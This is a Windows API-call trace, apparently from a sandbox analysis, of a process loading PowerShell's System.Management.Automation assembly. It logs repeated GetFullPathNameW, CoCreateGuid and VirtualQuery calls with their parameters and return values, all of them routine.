	[0283.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.662] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x259582b7, Data2=0x14c6, Data3=0x47f3, Data4=([0]=0xa8, [1]=0x7e, [2]=0x94, [3]=0xbf, [4]=0xb3, [5]=0x52, [6]=0xe2, [7]=0x24))) returned 0x0
	[0283.662] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x79b70280, Data2=0xa7eb, Data3=0x4d8b, Data4=([0]=0xb2, [1]=0x32, [2]=0x2e, [3]=0x6e, [4]=0xe7, [5]=0xeb, [6]=0x77, [7]=0x21))) returned 0x0
	[0283.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.601] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb8a1cc33, Data2=0x7601, Data3=0x492b, Data4=([0]=0x96, [1]=0xa1, [2]=0x34, [3]=0x96, [4]=0x4d, [5]=0x5d, [6]=0x2e, [7]=0x22))) returned 0x0
	[0285.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.606] VirtualQuery (in: lpAddress=0x26b340, lpBuffer=0x26c200, dwLength=0x30 | out: lpBuffer=0x26c200*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.607] VirtualQuery (in: lpAddress=0x26b3d0, lpBuffer=0x26c290, dwLength=0x30 | out: lpBuffer=0x26c290*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.608] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.610] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.612] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.612] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.612] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.612] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.613] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] VirtualQuery (in: lpAddress=0x26b780, lpBuffer=0x26c640, dwLength=0x30 | out: lpBuffer=0x26c640*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.614] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xe91042f4, Data2=0x4ed7, Data3=0x42e0, Data4=([0]=0x83, [1]=0x77, [2]=0xd9, [3]=0x1, [4]=0xa9, [5]=0x9, [6]=0xde, [7]=0xb8))) returned 0x0
	[0285.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
